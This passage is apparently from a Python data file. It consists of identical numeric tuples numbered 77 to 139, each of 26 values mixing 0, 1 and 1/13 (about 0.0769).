(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 77
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 78
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 79
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 80
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 81
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 82
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 83
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 84
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 85
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 86
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 87
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 88
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 89
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 90
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 91
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 92
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 93
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 94
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 95
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 96
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 97
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 98
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 99
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 100
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 101
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 102
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 103
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 104
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 105
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 106
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 107
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 108
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 109
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 110
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 111
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 112
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 113
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 114
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 115
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 116
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 117
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 118
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 119
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 120
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 121
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 122
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 123
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 124
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 125
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 126
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 127
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 128
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 129
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 130
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 131
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 132
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 133
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 134
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 135
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 136
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 137
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 138
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 139
